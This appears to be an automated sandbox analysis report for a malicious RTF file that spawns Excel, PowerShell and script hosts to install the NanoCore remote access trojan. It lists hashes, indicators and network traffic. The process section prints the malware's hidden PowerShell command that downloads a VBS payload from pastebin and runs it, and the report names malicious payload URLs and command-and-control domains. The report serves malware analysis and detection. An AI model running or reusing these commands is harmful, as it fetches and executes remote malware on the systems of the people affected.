analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

17cc5ab80cf22229ae31ed51367951a0

Full analysis: https://app.any.run/tasks/ca1aad7d-4c29-4c85-a443-1e1c81237dd1
Verdict: Malicious activity
Threats:

NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website.

Analysis date: July 18, 2019, 05:34:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
rat
nanocore
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

17CC5AB80CF22229AE31ED51367951A0

SHA1:

4F0B305E1A94BF66A9D4207844B3BFDFA76D5780

SHA256:

49396AD1A758120FEE92C7459CBBBB3738AA229F068C516B6919C602F7C654CE

SSDEEP:

12288:Q2gLaSYdHnVcvDsLfafj4zjVl2uvwuLFKMxmMjaccouFfm:zgLa9nO4fab0jVlpwiFhn9coH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3948)
      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2324)
      • cmd.exe (PID: 2600)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 3612)
      • cmd.exe (PID: 3508)
      • cmd.exe (PID: 2200)
      • cmd.exe (PID: 2204)
      • cmd.exe (PID: 3024)
      • cmd.exe (PID: 3192)
    • Loads the Task Scheduler COM API

      • WScript.exe (PID: 2476)
      • WScript.exe (PID: 3968)
      • WScript.exe (PID: 2220)
      • WScript.exe (PID: 3432)
      • WScript.exe (PID: 3216)
      • WScript.exe (PID: 3268)
      • WScript.exe (PID: 3716)
    • NanoCore was detected

      • InstallUtil.exe (PID: 3320)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
      • EXCEL.EXE (PID: 3464)
    • Creates files in the user directory

      • powershell.exe (PID: 3576)
      • powershell.exe (PID: 308)
      • powershell.exe (PID: 3660)
      • powershell.exe (PID: 1824)
      • powershell.exe (PID: 3636)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 3272)
      • powershell.exe (PID: 3480)
      • powershell.exe (PID: 1692)
      • powershell.exe (PID: 3632)
      • cmd.exe (PID: 3468)
      • Powershell.exe (PID: 3916)
      • powershell.exe (PID: 2492)
      • Powershell.exe (PID: 3644)
      • Powershell.exe (PID: 2980)
      • Powershell.exe (PID: 2044)
      • Powershell.exe (PID: 956)
      • InstallUtil.exe (PID: 3320)
      • Powershell.exe (PID: 3112)
      • Powershell.exe (PID: 3152)
    • Executes scripts

      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2324)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 3612)
      • cmd.exe (PID: 3508)
      • cmd.exe (PID: 2204)
      • cmd.exe (PID: 3024)
      • cmd.exe (PID: 3192)
    • Executed via WMI

      • cmd.exe (PID: 3468)
      • Powershell.exe (PID: 3916)
      • Powershell.exe (PID: 3644)
      • cmd.exe (PID: 3416)
      • Powershell.exe (PID: 2980)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 3692)
      • Powershell.exe (PID: 2044)
      • Powershell.exe (PID: 956)
      • cmd.exe (PID: 2164)
      • Powershell.exe (PID: 3112)
      • cmd.exe (PID: 1848)
      • cmd.exe (PID: 2636)
      • Powershell.exe (PID: 3152)
    • PowerShell script executed

      • Powershell.exe (PID: 3916)
      • Powershell.exe (PID: 3644)
      • Powershell.exe (PID: 2980)
      • Powershell.exe (PID: 2044)
      • Powershell.exe (PID: 956)
      • Powershell.exe (PID: 3112)
      • Powershell.exe (PID: 3152)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2476)
      • WScript.exe (PID: 3968)
      • WScript.exe (PID: 2220)
      • WScript.exe (PID: 3432)
      • WScript.exe (PID: 3216)
      • WScript.exe (PID: 3268)
      • WScript.exe (PID: 3716)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3312)
      • cmd.exe (PID: 1712)
      • cmd.exe (PID: 2584)
      • cmd.exe (PID: 3364)
      • cmd.exe (PID: 3816)
      • cmd.exe (PID: 4076)
      • cmd.exe (PID: 1492)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3532)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3532)
      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
      • EXCEL.EXE (PID: 3464)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1824)
      • powershell.exe (PID: 3272)
      • powershell.exe (PID: 3480)
      • powershell.exe (PID: 1692)
      • powershell.exe (PID: 2492)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 107
CharactersWithSpaces: 546
Characters: 466
Words: 81
Pages: 1
TotalEditTime: 2 minutes
RevisionNumber: 2
ModifyDate: 2019:07:17 10:07:00
CreateDate: 2019:07:17 13:04:00
LastModifiedBy: Joselio Bonin
Author: felipemkt894
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
89
Malicious processes
13
Suspicious processes
14

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs powershell.exe cmd.exe no specs ping.exe no specs excel.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs wscript.exe no specs wscript.exe no specs powershell.exe no specs cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs wscript.exe no specs cmd.exe no specs taskkill.exe no specs powershell.exe cmd.exe no specs powershell.exe excel.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs wscript.exe no specs taskkill.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs taskkill.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs #NANOCORE installutil.exe installutil.exe no specs taskkill.exe no specs wscript.exe no specs installutil.exe no specs installutil.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs installutil.exe no specs installutil.exe no specs installutil.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3532"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\17cc5ab80cf22229ae31ed51367951a0.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3872"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3576"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3948"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2500ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3232"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
308"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2592"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2868"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2176ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
8 373
Read events
6 979
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
39
Text files
15
Unknown types
4

Dropped files

PID
Process
Filename
Type
3532WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC5FF.tmp.cvr
MD5:
SHA256:
3872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRCE7B.tmp.cvr
MD5:
SHA256:
3872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF1C92D99DE6A0E350.TMP
MD5:
SHA256:
3232EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD419.tmp.cvr
MD5:
SHA256:
3576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMA896DKF62FX04PVYPC.temp
MD5:
SHA256:
3232EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFE3F9D2AC97DD9E39.TMP
MD5:
SHA256:
2868EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD7E1.tmp.cvr
MD5:
SHA256:
308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MU7QECVX9A9GV55VRUM9.temp
MD5:
SHA256:
3576powershell.exeC:\Users\Public\AvastUI.vbs
MD5:
SHA256:
2868EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFF4E60BDAC3E303E6.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
41
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3916
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
2980
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3644
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
2044
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
956
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3916
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
3112
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3644
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
2980
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
3152
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3636
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3576
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2492
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3272
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
1824
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3660
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
308
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
1692
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3480
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3276
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
www.m9c.net
  • 158.69.18.61
malicious
soucdtevoceumcuzao.duckdns.org
  • 152.253.153.118
malicious
bylgay.hopto.org
  • 152.246.81.100
malicious

Threats

PID
Process
Class
Message
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info